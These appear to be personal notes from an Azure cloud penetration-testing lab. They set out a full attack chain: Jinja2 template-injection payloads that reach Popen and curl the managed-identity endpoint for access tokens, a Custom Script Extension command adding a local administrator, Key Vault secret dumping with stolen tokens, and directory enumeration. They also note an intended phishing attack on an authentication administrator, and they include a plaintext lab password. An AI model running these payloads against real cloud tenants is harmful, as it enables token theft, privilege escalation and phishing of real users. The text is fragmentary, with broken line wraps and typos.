- Azure VMs User Data Abuse
- Azure VMs Custom Script Extension Abuse
Get-AzVMExtension -ResourceGroupName "Research" -VMName "infradminsrv"
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users studentx StudxPassword@123 /add /Y; net localgroup administrators student1 /add"}'
- Abuse SSTI
- Use got token with Az PowerShell to find all accesible resources
- To be able to access the keyvault request a keyvault access token,
- request new ARM access token via app rce and connect using Az PowerShell and use both the arm token and keyvault token
$token = 'eyJ0....'
$keyvaulttoken = 'eyJ0....'
Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
- check if we can access the keyvault and possible any secrets
Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
6. Let's see what Azure resources the user Kathy has access to. You may like to note that Kathy's access to Azure portal using a web browser is blocked using a Condition Access Policy
$password = ConvertTo-SecureString 'Gaxu@6991TEST$#*!@#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('[email protected]',$password)
Connect-AzAccount -Credential $creds
Get-AzResourcec
7. Let's enumerate role assignments on the VM 'jumpvm':
Get-AzRoleAssignment -Scope /subscriptions/b413826f-108d4049-8c11-d52d5d388768/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/jumpvm
8. So there is a group 'VM admins' that has the Virtual Machine Command Executor role on the jumpvm VM
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
9. Let's get some information about the VM admins group and its membership:
Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select UserPrincipalName
- We will use the Graph API to get all the details and not Az PowerShell. So [email protected] is added to an administrative unit 'Control Group'.
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
11. Let's get information and membership of this administrative unit using Azure AD module. We are using Kathy's credentials below:
Import-Module C:\AzAD\Tools\AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
Get-AzureADMSAdministrativeUnit -Id e1e26d93-163e-42a2-a46e-1b7d52626395
Get-AzureADMSAdministrativeUnitMember -Id e1e26d93-163e-42a2-a46e-1b7d52626395
12. The VM Admins group is a member of the administrative unit. Let's check for any roles scoped to this administrative unit:
Get-AzureADMSScopedMembership -Id e1e26d93-163e-42a2-a46e-1b7d52626395 | fl *
- Let's check the role using the RoleId we got above:
Get-AzureADDirectoryRole -ObjectId 5b3935ed-b52d-4080-8b05-3a1832194d3a
- Get some more details about the user Roy:
Get-AzureADUser -ObjectId 8c088359-66fb-4253-ad0da91b82fd548a | fl *
- Information collected from
jumpvm
about userRoy
execute a phishing attack against the user has authentication administrative role.
- Whoami Command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('whoami',shell=True,stdout=-1).communicate()}}
{% endif %}
{% endfor %}
- Variables command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl
"$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
{% endif %}
{% endfor %}
- Request a keyvault access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
{% endif %}
{% endfor %}
- Request a new ARM access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
{% if "Popen" in x.__name__ %}
{{x('curl
"$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
{% endif %}
{% endfor %}
{{''.__class__.__mro__[1].__subclasses__()}}
$Token = 'eyJ0eX..'
$URI = '
https://graph.microsoft.com/v1.0/users/[email protected]/memberOf'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value